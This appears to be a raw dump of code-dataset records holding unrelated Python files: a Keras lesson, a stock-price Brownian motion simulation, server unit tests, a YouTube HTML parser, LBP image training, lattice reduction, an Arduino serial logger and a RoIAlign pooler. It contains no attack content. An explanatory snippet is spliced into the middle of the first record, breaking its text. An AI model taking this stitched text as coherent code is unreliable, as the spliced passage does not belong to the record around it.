Modelクラスを作成(入力テンソルと出力テンソルを指定すればよい)\n# これで、「(784,)のInputを持つDense3層」構成のモデルが指定される\nmodel = Model(inputs=inputs, outputs=predictions)\n\n# 以降はSequentialと同じ\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train = x_train.reshape(-1, 784)\nx_test = x_test.reshape(-1, 784)\ny_train = 
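The script above wraps build_model in KerasClassifier so sklearn's RandomizedSearchCV can sample from the hyperparameter dict; the dict keys must match the builder's argument names. The same search wiring, shown with a plain sklearn estimator so the sketch runs without TensorFlow (the estimator and grid are stand-ins):

from sklearn.datasets import load_digits
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import RandomizedSearchCV

X, y = load_digits(return_X_y=True)

# keys must match the estimator's parameters, just as the dict above
# must match build_model's signature
param_dist = {'C': [0.01, 0.1, 1.0, 10.0], 'max_iter': [300, 600]}

search = RandomizedSearchCV(LogisticRegression(), param_dist, n_iter=4, cv=3)
search.fit(X, y)
print(search.best_params_)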
to_categorical(y_train)\ny_test = to_categorical(y_test)\n\nmodel.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])\nmodel.fit(x_train, y_train)\n\nprint(model)\n","sub_path":"src/lesson4/lesson_4_1.py","file_name":"lesson_4_1.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"334889491","text":"# simulate brownian motion\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Plot grayscale\nplt.style.use('grayscale')\n\nn=252 # full year in trading days\ndt=0.00001 # to be somewhat stable in time\n\nx=pd.DataFrame()\n\n#np.random.seed(1)\n\ndef makeFig():\n\tx.columns=['V','SAP','JPM','MSFT', 'AAPL','INTC','MITT']\n\t#stock=['V','SAP','JPM','MSFT','AAPL','INTC','MITT']\n\t#colstock=['blue','orange','green','red', 'pink','yellow', 'olive']\n\tcolumncols = ['blue','orange','green','red','pink','yellow', 'olive']\n\tx.plot(color = columncols)\n\tplt.legend(x.columns)\n\tplt.xlabel('t')\n\tplt.ylabel('X')\n\tplt.title('brownian motion finance model with averaged inputs')\n\tplt.show()\n\n\t\ndef GBM(x0, mu, sigma):\n\tx=pd.DataFrame()\n\tdef local(x0,mu,sigma):\n\t\tstep=np.exp((mu-sigma**2/2)*dt)*np.exp(sigma*np.random.normal(0,np.sqrt(dt),(1,n)))\n\t\treturn [x0*step.cumprod()]\n\t# for s in range(0,3):\n\t\t# if s == 0:\n\t\t\t# tmp = np.concatenate((local(x0,mu,sigma),local(x0,mu,sigma)),axis = 0)\n\t\t# else:\n\t\t\t# tmp = np.concatenate((tmp,local(x0,mu,sigma)),axis = 0)\n\t# ttt = np.mean(tmp,0)\n\treturn pd.DataFrame(local(x0,mu,sigma))\n\t\n# task: GBM with stochastic volatility\ndef GMBstochVolal(x0,mu,sigma,sigmasigma):\n\t\"\"\"drive sigma with own GBM using sigmasigma as sigma\"\"\"\n\treturn NotImplementedError\n\ndef sumup():\n\tx=pd.DataFrame()\n\t# VISA\n\tx0 = 107.4# start value\n\tmu = 1.15# estimate\n\tsigma = 11.79# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\t\t\n\t# SAP\n\tx0 = 113.21# start value\n\tmu = 1.03# estimate\n\tsigma = 5.16# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\t\n\t# JPM\n\tx0 = 95.224# start value\n\tmu = 1.083# estimate\n\tsigma = 7.88# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\n\t# MSFT\n\tx0 = 74.72# start value\n\tmu = 1.14# estimate\n\tsigma =10.469# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\n\t# # AAPL\n\t# x0 = 173.332# start value\n\t# mu = 1.184# estimate\n\t# sigma = 15.6109# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\n\t# INTC\n\tx0 = 32.4168# start value\n\tmu = 1.0641# estimate\n\tsigma = 5.6348# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\n\t# MITT\n\tx0 = 17.23028# start value\n\tmu = 1.006119# estimate\n\tsigma = 0.9179# volatility\n\n\ttemp = GBM(x0, mu, sigma)\n\tx=pd.concat([x,temp],axis=0)\n\t\n\treturn x\n\nfor s in range(1000):\t\n\tif np.mod(s,50) == 0:\n\t\tprint('called')\n\tx = pd.concat([x,sumup().sum(level=0)],axis=0)\n\n\t\n# # plot some shit\n# makeFig()\n\t\nplt.plot(np.mean(x,0))\nplt.plot(np.mean(x,0)+np.std(x,0))\nplt.plot(np.mean(x,0)-np.std(x,0))\nplt.show()\n\t\n\n\n","sub_path":"BrownianBridgeMarketTiming.py","file_name":"BrownianBridgeMarketTiming.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"520323565","text":"from datetime import datetime\nfrom dateutil.parser 
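The GBM helper in the Brownian-motion record builds a path by cumulatively multiplying per-step factors exp((mu - sigma^2/2) dt) * exp(sigma sqrt(dt) Z). An equivalent vectorized sketch that sums log-increments instead of multiplying factors (the parameter values are illustrative):

import numpy as np

def gbm_path(x0, mu, sigma, dt, n, seed=0):
    rng = np.random.default_rng(seed)
    # X_k = x0 * exp(cumsum((mu - sigma^2/2) dt + sigma sqrt(dt) Z_k))
    log_steps = (mu - 0.5 * sigma**2) * dt + sigma * np.sqrt(dt) * rng.normal(size=n)
    return x0 * np.exp(np.cumsum(log_steps))

print(gbm_path(100.0, 0.05, 0.2, 1 / 252, 5))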
import isoparse\nfrom dateutil.tz import tzutc\n\nfrom unittest import TestCase\nfrom unittest.mock import Mock, patch\n\nfrom fdbk import DictConnection\nfrom fdbk.server import parse_filter_parameters, ServerHandlers, generate_app\nfrom fdbk.server._server_handlers import _get_overwrite\n\nfrom test_data_tools import AGGREGATE_ALWAYS_DATA, AGGREGATE_ALWAYS_TOPIC\n\nclass ServerHandlersTest(TestCase):\n def _assert_status(self, expected_status, function, *args, **kwargs):\n data, status = function(*args, **kwargs)\n self.assertEqual(status, expected_status, f'data={str(data)}')\n return data\n\n def _create_topic(self, server_handlers, topic):\n response = self._assert_status(200, server_handlers.add_topic, topic)\n return response.get(\"topic_id\")\n\n def test_server_from_plugin_name(self):\n generate_app(db_plugin='dict', db_parameters=[])\n\n def test_parse_filter_parameters(self):\n params = dict(\n since=\"2020-04-26T19:18:14.123456Z\",\n until=\"2020-04-26T19:18:14.123456Z\",\n limit=\"123\",\n aggregate_to=\"25\",\n aggregate_with=\"min\",\n asd=\"asd\"\n )\n\n for include_aggretate in (True, False):\n parsed = parse_filter_parameters(params, include_aggretate)\n self.assertEqual(parsed.get(\"since\"), datetime(2020,4,26,19,18,14,123456, tzutc()))\n self.assertEqual(parsed.get(\"until\"), datetime(2020,4,26,19,18,14,123456, tzutc()))\n self.assertEqual(parsed.get(\"limit\"), 123)\n if include_aggretate:\n self.assertEqual(parsed.get(\"aggregate_to\"), 25)\n self.assertEqual(parsed.get(\"aggregate_with\"), \"min\")\n else:\n self.assertIsNone(parsed.get(\"aggregate_to\"))\n self.assertIsNone(parsed.get(\"aggregate_with\"))\n self.assertIsNone(parsed.get(\"asd\"))\n\n def test_get_overwrite(self):\n self.assertTrue(_get_overwrite(dict(overwrite=\"true\")))\n self.assertTrue(_get_overwrite(dict(overwrite=\"TrUe\")))\n self.assertFalse(_get_overwrite(dict(overwrite=\"cat\")))\n self.assertFalse(_get_overwrite(dict(animal=\"cow\")))\n\n def test_parse_filter_parameters_catches_parsing_error(self):\n parsed = parse_filter_parameters(dict(limit=\"cow\"))\n self.assertIsNone(parsed.get(\"limit\"))\n\n def test_add_topic_returns_400_when_topic_name_missing(self):\n s = ServerHandlers(DictConnection())\n self._assert_status(400, s.add_topic, {})\n\n def test_add_topic_returns_400_when_topic_data_is_invalid(self):\n s = ServerHandlers(DictConnection())\n self._assert_status(400, s.add_topic, dict(name=\"test\", fields=123))\n\n def test_add_topic_returns_200_on_success(self):\n s = ServerHandlers(DictConnection())\n self._assert_status(200, s.add_topic, dict(name=\"topic\"))\n\n def test_add_data_get_data_and_get_latest_and_get_summary_get_overview(self):\n s = ServerHandlers(DictConnection())\n\n self._assert_status(404, s.get_latest, None)\n\n data_tools = [\n {\"field\":\"number\", \"method\":\"line\"},\n ]\n topic_id = self._create_topic(s, dict(name=\"topic\", fields=[\"number\"], data_tools=data_tools))\n\n self._assert_status(404, s.get_latest, topic_id)\n\n response = self._assert_status(200, s.get_data, topic_id, {})\n self.assertEqual(len(response), 0)\n\n self._assert_status(200, s.add_data, topic_id, dict(number=3))\n\n response = self._assert_status(200, s.get_latest, topic_id)\n self.assertEqual(response.get(\"number\"), 3)\n\n self._assert_status(200, s.add_data, topic_id, dict(number=3))\n\n response = self._assert_status(200, s.get_data, topic_id, {})\n self.assertEqual(len(response), 2)\n\n self._assert_status(200, s.get_summary, topic_id, {})\n\n for i in range(5):\n 
self._assert_status(200, s.add_data, topic_id, dict(number=i))\n\n response = self._assert_status(200, s.get_overview, None, dict(aggregate_to=3))\n data = response[\"statistics\"][0][\"payload\"][\"data\"][\"datasets\"][0][\"data\"]\n self.assertLessEqual(len(data), 3)\n\n def test_add_data_validations(self):\n s = ServerHandlers(DictConnection())\n\n self._assert_status(404, s.add_data, None, dict(number=3))\n\n topic_id = self._create_topic(s, dict(name=\"topic\", fields=[\"number\"]))\n self._assert_status(400, s.add_data, topic_id, dict(letter=\"a\"))\n\n def test_get_topic(self):\n s = ServerHandlers(DictConnection())\n\n self._assert_status(404, s.get_topic, None)\n topic_id = self._create_topic(s, dict(name=\"topic\", fields=[\"number\"]))\n self._assert_status(200, s.get_topic, topic_id)\n\n def test_aggregate(self):\n s = ServerHandlers(DictConnection())\n topic_id = self._create_topic(s, AGGREGATE_ALWAYS_TOPIC)\n for data in AGGREGATE_ALWAYS_DATA:\n data['timestamp'] = isoparse(data['timestamp']).replace(tzinfo=None)\n self._assert_status(200, s.add_data, topic_id, data)\n\n tests = [\n (s.get_summary, (topic_id, dict(aggregate_to=\"5\", aggregate_with='sum')), 4),\n (s.get_summary, (topic_id, dict(aggregate_to=\"5\", aggregate_with='sum', aggregate_always=\"tRuE\")), 2),\n (s.get_overview, (None, dict(aggregate_to=\"5\", aggregate_with='sum')), 4),\n (s.get_overview, (None, dict(aggregate_to=\"5\", aggregate_with='sum', aggregate_always=\"True\")), 2),\n ]\n\n for fn, params, count in tests:\n data = self._assert_status(200, fn, *params)\n aggregated = data['statistics'][0]['payload']['data']['datasets'][0]['data']\n self.assertEqual(len(aggregated), count)\n","sub_path":"tst/test_server_handlers.py","file_name":"test_server_handlers.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"200435972","text":"# -*- coding: utf-8 -*-\nimport re\nfrom collections import namedtuple\nfrom pyquery import PyQuery\n\nYoutubeMV = namedtuple('YoutubeMV', 'title cover play_url view_count runtime')\n\n\ndef get_view_count(aria_label):\n search_result = re.search('([0-9,]+) views', aria_label)\n if not search_result:\n return 0\n return int(search_result.group(1).replace(',', ''))\n\n\ndef get_runtime(duration):\n segs = duration.split(':')\n if len(segs) == 3:\n return int(segs[0]) * 3600 + int(segs[1]) * 60 + int(segs[2])\n if len(segs) == 2:\n return int(segs[0]) * 60 + int(segs[1])\n if len(segs) == 1:\n return int(duration) if duration.isdigit() else 0\n return 0\n\n\ndef parse(file_name):\n result = []\n with open(file_name) as f:\n page = PyQuery(f.read())\n videos = page(\"div[id='content']\")\n for video in videos:\n a = video.xpath('./a/ytd-thumbnail/a')\n if not a:\n continue\n\n play_url = a[0].get('href')\n\n img = a[0].xpath('./yt-img-shadow/img')\n if not img:\n continue\n\n cover = img[0].get('src')\n\n overlay = a[0].xpath('./div/ytd-thumbnail-overlay-time-status-renderer')\n if not overlay:\n continue\n\n runtime = get_runtime(overlay[0].text_content().strip())\n video_title = video.xpath('./a/div/h3/span')\n if not video_title:\n continue\n\n title = video_title[0].get('title')\n aria = video_title[0].get('aria-label')\n view_count = get_view_count(aria)\n\n result.append(YoutubeMV(\n title=title,\n cover=cover,\n play_url=play_url,\n view_count=view_count,\n runtime=runtime\n ))\n\n return result\n\nif __name__ == '__main__':\n 
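parse_filter_parameters in the fdbk tests turns query strings like "2020-04-26T19:18:14.123456Z" into tz-aware datetimes via dateutil. The round trip those tests assert, shown in isolation:

from datetime import datetime
from dateutil.parser import isoparse
from dateutil.tz import tzutc

parsed = isoparse('2020-04-26T19:18:14.123456Z')
assert parsed == datetime(2020, 4, 26, 19, 18, 14, 123456, tzutc())
print(parsed.tzinfo)  # tzutc()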
print(parse('aaa.html'))\n","sub_path":"scripts/parse_youtube_playlist.py","file_name":"parse_youtube_playlist.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"104891671","text":"import os\r\nimport math\r\nimport cv2\r\nimport csv\r\nfrom skimage.feature import local_binary_pattern\r\nfrom scipy.stats import itemfreq\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sklearn.externals import joblib\r\nimport cvutils\r\n\r\nfrom LBP.AOP import Aspects\r\n\r\n\r\nclass TrainingModel(object):\r\n def __init__(self):\r\n self._train_images = None\r\n self._train_dict = None\r\n self._normalized_histograms = []\r\n self._image_paths = []\r\n self._class_labels = []\r\n\r\n @Aspects.param_validator\r\n def set_train_images(self, training_set_path):\r\n try:\r\n self._train_images = cvutils.imlist(training_set_path)\r\n except AssertionError as ae:\r\n print(ae)\r\n\r\n @property\r\n def train_images(self):\r\n return self._train_images\r\n\r\n # @Aspects.param_validator\r\n # @Aspects.file_checker\r\n def set_train_dict(self, image_labels_path):\r\n raw_train_dict = dict()\r\n if os.path.exists(image_labels_path) and Aspects.file_checker(image_labels_path):\r\n with open(image_labels_path, 'rt') as csvfile:\r\n try:\r\n reader = csv.reader(csvfile, delimiter=' ')\r\n for row in reader:\r\n try:\r\n raw_train_dict[row[0]] = int(row[1])\r\n except IndexError:\r\n pass\r\n except csv.Error as e:\r\n print(e)\r\n else:\r\n print(\"No suitable file for image labels: {}\".format(image_labels_path))\r\n\r\n self._train_dict = raw_train_dict\r\n\r\n @property\r\n def train_dict(self):\r\n return self._train_dict\r\n\r\n def set_raw_results(self):\r\n raw_histograms = []\r\n raw_img_paths = []\r\n raw_class_labels = []\r\n if self.train_images:\r\n for train_image in self.train_images:\r\n print(\"Done with {} for training\".format(train_image))\r\n im = cv2.imread(train_image)\r\n im_gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY) # greyscale\r\n radius = 3\r\n no_points = 8 * radius # 8 neighbours, 24 points\r\n lbp_mask = local_binary_pattern(im_gray, no_points, radius, method='uniform')\r\n x = itemfreq(lbp_mask.ravel()) # calculate the histogram\r\n lbp_hist = x[:, 1] / sum(x[:, 1]) # normalize\r\n raw_histograms.append(train_image)\r\n raw_img_paths.append(lbp_hist)\r\n raw_class_labels.append(self.train_dict[os.path.split(train_image)[1]])\r\n self._normalized_histograms = raw_histograms\r\n self._image_paths = raw_img_paths\r\n self._class_labels = raw_class_labels\r\n\r\n @property\r\n def normalized_histograms(self):\r\n return self._normalized_histograms\r\n\r\n @property\r\n def image_paths(self):\r\n return self._image_paths\r\n\r\n @property\r\n def class_labels(self):\r\n return self._class_labels\r\n\r\n @Aspects.param_validator\r\n @Aspects.exception_logger\r\n @Aspects.result_logger\r\n def serialize_raw_results(self, pickle_path):\r\n try:\r\n joblib.dump((self.normalized_histograms, self.image_paths, self.class_labels), pickle_path, compress=3)\r\n return pickle_path\r\n except(TypeError, KeyError):\r\n print(\"Something wrong\")\r\n return 0\r\n\r\n @Aspects.exception_logger\r\n @Aspects.result_logger\r\n @Aspects.path_exists\r\n def display_results(self):\r\n nrows = math.ceil((len(self.train_images)) / 3)\r\n ncols = 3\r\n fig, axes = plt.subplots(nrows, ncols)\r\n for row in range(nrows):\r\n for col in range(ncols):\r\n try:\r\n if 
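get_runtime in the playlist record handles h:mm:ss, m:ss and bare seconds with three branches; weighting parts by powers of 60 from the right collapses them into one expression with the same results for well-formed one-to-three-part durations:

def get_runtime(duration):
    parts = duration.split(':')
    if not all(p.isdigit() for p in parts):
        return 0
    # weight by 60^position from the right: seconds, minutes, hours
    return sum(int(p) * 60 ** i for i, p in enumerate(reversed(parts)))

print(get_runtime('1:02:03'))  # 3723
print(get_runtime('4:05'))     # 245
print(get_runtime('42'))       # 42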
Aspects.path_exists(self.image_paths[row * ncols + col]) and (row * ncols + col) < len(self.image_paths):\r\n axes[row][col].imshow(cv2.imread(self.image_paths[row * ncols + col]))\r\n axes[row][col].axis('off')\r\n axes[row][col].set_title(\"{}\".format(os.path.split(self.image_paths[row * ncols + col])[1]))\r\n except UnicodeDecodeError:\r\n print(self.image_paths[row*ncols + col])\r\n fig.canvas.draw()\r\n im_ts = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')\r\n im_ts = im_ts.reshape(fig.canvas.get_width_height()[::-1] + (3,))\r\n cv2.imshow(\"Training Set\", im_ts)\r\n cv2.waitKey()\r\n","sub_path":"LBP/training_model.py","file_name":"training_model.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"161330177","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*\r\n#\r\n# Written under Python 2.7 for Windows, not tested on Python 3\r\n#\r\n# Code by genBTC. Created from scratch 10/14/2015. \r\n#\r\n# Saves all the paths for the entire program in settings.ini. Handles dynamic path redirection generation on first run.\r\n# Performs the settings.ini set,get,save tasks.\r\n# The only thing you should need to edit is the .ini file. \r\n# You can however edit the path to resume.dat here, but please note: Editing this file does not CHANGE an existing settings.ini file once it already exists.\r\n# This script is only to generates the default values and put them in settings.ini. You will have to edit the path to resume.dat in the settings.ini file.\r\n# \r\n# Version 0.1 - functional since 10/14/2015.\r\n\r\nfrom ConfigParser import RawConfigParser\r\nimport os.path\r\n\r\nclass Preferences():\r\n ''' Represents the application preferences. '''\r\n FILENAME = 'settings.ini'\r\n SECTION = \"MAIN\"\r\n utresumedat = \"C:\\\\Users\\\\EOFL\\\\AppData\\\\Roaming\\\\uTorrent\\\\resume.dat\"\r\n\r\n scriptsdir = os.path.dirname(os.path.realpath(__file__)) #the dir where these scripts are run from; C:\\\\??\\scripts\r\n maindir = os.path.dirname(scriptsdir) #the parent dir of \"scripts\"; C:\\\\??\r\n \r\n # filenames needs a unicode u symbol so os. 
commands work on paths with funny chars\r\n script1sourcedir = u\"seeding\\\\\"\r\n outpath1 = u\"1seeding_ID+Hash+Filename.txt\"\r\n\r\n credentialsfile = u\"scripts\\\\credentials.txt\"\r\n cookiesfile = u\"scripts\\\\cookies.dat\"\r\n\r\n script2destdir = u\"hash-grabs\\\\\"\r\n script3destdir = u\"hash-grabs-as-filenames\\\\\"\r\n outpath3 = u\"3propernames.txt\"\r\n outpath4 = u\"4beforepath-afterpath.txt\"\r\n\r\n def __init__(self):\r\n self.__do_configfile()\r\n \r\n # start private methods\r\n \r\n def __do_configfile(self):\r\n # initialize config parser\r\n self.configparser = RawConfigParser()\r\n\r\n # __load or (if non-existent) create config file\r\n if os.path.isfile(self.FILENAME):\r\n self.__load()\r\n else:\r\n self.__init_with_defaults() #only create if it doesnt exist.\r\n self.save()\r\n \r\n def __init_with_defaults(self):\r\n self.configparser.add_section(self.SECTION)\r\n self.set('utresumedat', self.utresumedat)\r\n self.set('scriptsdir', self.scriptsdir)\r\n self.set('maindir', self.maindir)\r\n self.set('script1sourcedir', self.script1sourcedir)\r\n self.set('outpath1', self.outpath1)\r\n self.set('credentialsfile', self.credentialsfile)\r\n self.set('cookiesfile', self.cookiesfile)\r\n self.set('script2destdir', self.script2destdir)\r\n self.set('script3destdir', self.script3destdir)\r\n self.set('outpath3', self.outpath3)\r\n self.set('outpath4', self.outpath4)\r\n\r\n def __load(self):\r\n ''' Loads or reloads the config from the .ini file '''\r\n self.configparser.read(self.FILENAME)\r\n\r\n # end private methods\r\n\r\n # start public methods\r\n\r\n def get(self, key):\r\n ''' Retrieves a property from the MAIN section '''\r\n return self.configparser.get(self.SECTION, key)\r\n\r\n def getwpath(self, key):\r\n ''' Retrieves a property from the MAIN section \r\n and pre-pend the maindir for a full pathname '''\r\n return os.path.join(self.maindir,self.configparser.get(self.SECTION, key))\r\n\r\n def set(self, key, value):\r\n ''' Stores a property to the MAIN section '''\r\n self.configparser.set(self.SECTION, key, value)\r\n\r\n def save(self):\r\n ''' Saves the config to the .ini file '''\r\n with open(self.FILENAME, 'wb') as configfile:\r\n self.configparser.write(configfile)\r\n\r\n # end public methods\r\n","sub_path":"scripts/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"602712480","text":"# -*- coding: utf-8 -*-\nfrom pylab import *\n#ion()\nimport numpy as np\nclose(\"all\")\nclear_all()\nimport itertools as it\n\ndef draw(a,b,ttl): \n figure()\n xq=list(it.product( range(-10,10,1), range(-10,10,1)))# x query\n L=np.array([x[0]*a+x[1]*b for x in xq])\n quiver(0,0,a[0],a[1],angles='xy',scale_units='xy',scale=1,color='b',label='base1')\n quiver(0,0,b[0],b[1],angles='xy',scale_units='xy',scale=1,color='r',label='base2')\n plot(L[:,0],L[:,1],'ok')\n grid()\n legend()\n title(ttl) \n axis('equal')\n xlim(-5,5)\n ylim(-5,5)\n\ndef L1norm(a):\n return np.sqrt(np.dot(a.T,a))\ndef vec(lst):\n return np.array(lst)[:, np.newaxis] \n\nclass Lattice2d:\n def __init__(self,a,b):\n self.setBasis(a,b,'initial create')\n def getBasis(self):\n return [self.a,self.b] \n def setBasis(self,a,b,comment):\n self.a=a\n self.b=b\n self.comment=comment\n draw(self.a,self.b,self.comment)\n def isOrdered(self):\n a,b=self.a,self.b\n if L1norm(a) <= L1norm(a-b) <= L1norm(b):\n print('Well Ordered')\n return True\n print('Not Ordered')\n 
return False\n def isReduced(self):\n a,b=self.a,self.b\n if L1norm(a) <= L1norm(a+b) \\\n and L1norm(a) <= L1norm(a-b)\\\n and L1norm(b) <= L1norm(a+b) \\\n and L1norm(b) <= L1norm(a-b):\n print('Reduced')\n return True\n print('Not Reduced')\n return False\n\ndef gauss2d(L):\n a,b=L.getBasis()\n if L1norm(a)>L1norm(b):\n a,b=b,a\n if L1norm(a-b)>L1norm(a+b):\n b=-b\n\n L.setBasis(a,b,'after preprocess, Reduced or Ordered')\n if L1norm(b)<=L1norm(a-b):\n L.setBasis(a,b,'already had Reduced by preprocess')\n return L\n if L1norm(a)<=L1norm(a-b): \n L.setBasis(a,b,'already had Ordered by preprocess') \n return loop(L)\n if L1norm(a)==L1norm(b):\n L.setBasis(a-b,a,'Reduced by swapping')\n return(L)\n L.setBasis(b-a,b,'Ordered by swapping')\n return loop(L)\n\ndef loop(L):\n while not L.isReduced():\n a,b=L.getBasis()\n norms=[L1norm(b-mu*a) for mu in np.arange(1,2*L1norm(b)/L1norm(a))]\n mu_min=np.argmin(norms)+1\n b=b-mu_min*a\n if L1norm(a-b) > L1norm(a+b):\n b=-b\n a,b=b,a\n L.setBasis(a,b,'in loop process')\n return L\n\n\nif __name__==\"__main__\": \n a,b=vec([2,1]),vec([0,3])\n L=Lattice2d(a,b)\n \n print('-----------------')\n L.isOrdered()\n L.isReduced()\n print('-----------------')\n\n gauss2d(L)\n ","sub_path":"kanyakukitei.py","file_name":"kanyakukitei.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"149998909","text":"from typing import List\nfrom dataclasses import dataclass\n\n\nclass BlaIterator:\n\n def __init__(self, bla: 'Bla') -> None:\n self.bla = bla\n self.i = 0\n self.j = 0\n\n def __next__(self) -> int:\n\n if self.i < len(self.bla.kek):\n value = self.bla.kek[self.i]\n self.i += 1\n return value\n\n if self.j < len(self.bla.lol):\n value = self.bla.lol[self.j]\n self.j += 1\n return value\n\n raise StopIteration\n\n\n@dataclass\nclass Bla:\n kek: List[int]\n lol: List[int]\n\n def __iter__(self) -> BlaIterator:\n return BlaIterator(self)\n\n\ndef main() -> None:\n b1 = Bla(kek=[11, 22, 33, 44], lol=[55, 66, 77, 88, 99])\n\n for k in b1:\n print(k)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bare_python/s05_04_loopable_iterator.py","file_name":"s05_04_loopable_iterator.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"511385601","text":"#!/usr/bin/python\nimport sqlite3\nimport serial\nfrom datetime import datetime\nimport time\n\nport = \"/dev/ttyUSB0\"\narduino_serial = serial.Serial(port, 115200)\narduino_serial.flush()\ntime.sleep(2)\ndatabase = sqlite3.connect('server.db')\ndatabsepointer = database.cursor()\ndatabsepointer.execute(\"CREATE TABLE IF NOT EXISTS temparduino(temp REAL,humid REAL, date TEXT)\")\n\ndef readserial():\n\n while 1:\n if arduino_serial.inWaiting() > 0:\n data = arduino_serial.readline()\n # [\"b'42.80\", \"42.80\\\\r\\\\n'\"]\n # ['2016-07-15', '13:24:02.886386']\n d = str(data)\n values = d.split(\" \")\n v1 = values[0]\n v2 = values[1]\n temp_val = float(v1[2:])\n humid_val = float(v2[:5])\n date = str(datetime.now())\n time_stamp = date.split(\" \")\n current_time = time_stamp[1]\n time_val = time_stamp[0]+\" \"+current_time[:5]\n databsepointer.execute(\"INSERT INTO temparduino(temp,humid,date) VALUES (?,?,?)\", (temp_val, humid_val,time_val))\n database.commit()\n time.sleep(1800)\n\n\nif __name__ == \"__main__\":\n readserial()\n","sub_path":"arduno flask 
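The kanyakukitei record reduces a 2-D lattice basis with a Gauss-style loop plus explicit ordered/reduced checks. A compact sketch of the classical Gauss (Lagrange) reduction: keep the shorter vector first and subtract the rounded projection until it vanishes (flat numpy vectors stand in for the column vectors used above):

import numpy as np

def gauss_reduce(a, b):
    a, b = np.asarray(a, float), np.asarray(b, float)
    while True:
        if a @ a > b @ b:
            a, b = b, a                    # keep a the shorter vector
        mu = round((a @ b) / (a @ a))      # nearest-integer projection of b on a
        if mu == 0:
            return a, b
        b = b - mu * a

print(gauss_reduce([2, 1], [0, 3]))        # same starting basis as the script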
app/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"182841614","text":"# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\n\nfrom torchvision.ops import roi_align\n\nfrom torchvision.ops.boxes import box_area\n\n\nclass LevelMapper(object):\n \"\"\"Determine which FPN level each RoI in a set of RoIs should map to based\n on the heuristic in the FPN paper.\n \"\"\"\n\n def __init__(self, k_min, k_max, canonical_scale=224, canonical_level=4, eps=1e-6):\n \"\"\"\n Arguments:\n k_min (int)\n k_max (int)\n canonical_scale (int)\n canonical_level (int)\n eps (float)\n \"\"\"\n self.k_min = k_min\n self.k_max = k_max\n self.s0 = canonical_scale\n self.lvl0 = canonical_level\n self.eps = eps\n\n def __call__(self, boxlists):\n \"\"\"\n Arguments:\n boxlists (list[BoxList])\n \"\"\"\n # Compute level ids\n s = torch.sqrt(torch.cat([box_area(boxlist) for boxlist in boxlists]))\n\n # Eqn.(1) in FPN paper\n target_lvls = torch.floor(self.lvl0 + torch.log2(s / self.s0 + self.eps))\n target_lvls = torch.clamp(target_lvls, min=self.k_min, max=self.k_max)\n return target_lvls.to(torch.int64) - self.k_min\n\n\nclass MultiScaleRoIAlign(nn.Module):\n \"\"\"\n Pooler for Detection with or without FPN.\n It currently hard-code ROIAlign in the implementation,\n but that can be made more generic later on.\n Also, the requirement of passing the scales is not strictly necessary, as they\n can be inferred from the size of the feature map / size of original image,\n which is available thanks to the BoxList.\n \"\"\"\n\n def __init__(self, featmap_names, output_size, sampling_ratio):\n \"\"\"\n Arguments:\n output_size (list[tuple[int]] or list[int]): output size for the pooled region\n scales (list[float]): scales for each Pooler\n sampling_ratio (int): sampling ratio for ROIAlign\n \"\"\"\n super(MultiScaleRoIAlign, self).__init__()\n if isinstance(output_size, int):\n output_size = (output_size, output_size)\n self.featmap_names = featmap_names\n self.sampling_ratio = sampling_ratio\n self.output_size = tuple(output_size)\n self.scales = None\n self.map_levels = None\n\n def convert_to_roi_format(self, boxes):\n concat_boxes = torch.cat(boxes, dim=0)\n device, dtype = concat_boxes.device, concat_boxes.dtype\n ids = torch.cat(\n [\n torch.full((len(b), 1), i, dtype=dtype, device=device)\n for i, b in enumerate(boxes)\n ],\n dim=0,\n )\n rois = torch.cat([ids, concat_boxes], dim=1)\n return rois\n\n def infer_scale(self, feature, original_size):\n # assumption: the scale is of the form 2 ** (-k), with k integer\n size = feature.shape[-2:]\n possible_scales = []\n for s1, s2 in zip(size, original_size):\n approx_scale = float(s1) / s2\n scale = 2 ** torch.tensor(approx_scale).log2().round().item()\n possible_scales.append(scale)\n assert possible_scales[0] == possible_scales[1]\n return possible_scales[0]\n\n def setup_scales(self, features, image_shapes):\n original_input_shape = tuple(max(s) for s in zip(*image_shapes))\n scales = [self.infer_scale(feat, 